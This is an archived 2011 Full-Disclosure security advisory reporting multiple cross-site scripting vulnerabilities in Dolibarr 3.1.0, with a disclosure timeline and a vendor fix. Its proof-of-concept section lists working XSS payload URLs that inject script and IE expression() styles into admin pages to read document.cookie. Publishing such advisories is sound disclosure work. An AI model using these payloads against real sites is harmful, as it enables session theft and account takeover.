| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 9 Nov 2011 11:49:30 +0000 From: "Schurtz, Stefan" <S.Schurtz@...oserve.de> To: "'full-disclosure@...ts.grok.org.uk'" <full-disclosure@...ts.grok.org.uk> Subject: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 Advisory: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0 Advisory ID: INFOSERVE-ADV2011-03 Author: Stefan Schurtz Contact: security@...oserve.de Affected Software: Successfully tested on Dolibarr 3.1.0 other versions may also be affected Vendor URL: http://www.dolibarr.org/ Vendor Status: fixed in the 3.1 branch ========================== Vulnerability Description ========================== Dolibarr 3.1.0 is prone to multiple XSS vulnerability ================== PoC-Exploit ================== Cross-Site-Scripting - parameter 'username' http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</ script><script>alert(document.cookie)</script> http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</ script><script>alert(document.cookie)</script>&=3&optioncss=print IE-only http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie)) http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie)) ========= Solution: ========= Fixed in the 3.1 branch ==================== Disclosure Timeline: ==================== 08-Nov-2011 - vendor informed 09-Nov-2011 - vendor fix in the 3.1 branch 09-Nov-2011 - release date of this security advisory ======== Credits: ======== Vulnerabilities found and advisory written by the INFOSERVE Security Team =========== References: =========== https://doliforge.org/tracker/?func=detail&aid=232&group_id=144 https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4 207e78a1 http://www.dolibarr.org/ Best regards, Stefan Schurtz | SECURE INFRASTRUCTURE INFOSERVE GmbH | Am Felsbrunnen 15 | D-66119 Saarbrücken Fon +49 (0)681 88008-52 | Fax +49 (0)681 88008-33 | s.schurtz@...oserve.de | www.infoserve.de Handelsregister: Amtsgericht Saarbrücken, HRB 11001 | Erfüllungsort: Saarbrücken Geschäftsführer: Dr. Stefan Leinenbach | Ust-IdNr.: DE168970599 Content of type "text/html" skipped Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (7511 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists